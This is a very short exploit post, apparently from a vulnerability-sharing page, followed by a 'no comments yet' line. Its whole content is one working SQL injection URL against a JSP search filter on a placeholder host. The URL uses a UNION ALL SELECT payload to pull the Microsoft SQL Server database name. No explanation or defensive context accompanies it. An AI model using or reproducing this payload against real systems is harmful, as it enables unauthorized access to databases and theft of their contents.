exp:
http://xxx.com/indexsearch/filter.jsp?tableId=1 UNION ALL SELECT NULL,NULL,char(126)+char(126)+char(126)+isnull(cast(db_name() as nvarchar(4000)),char(32))+char(126)+char(126)+char(126),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

暂无评论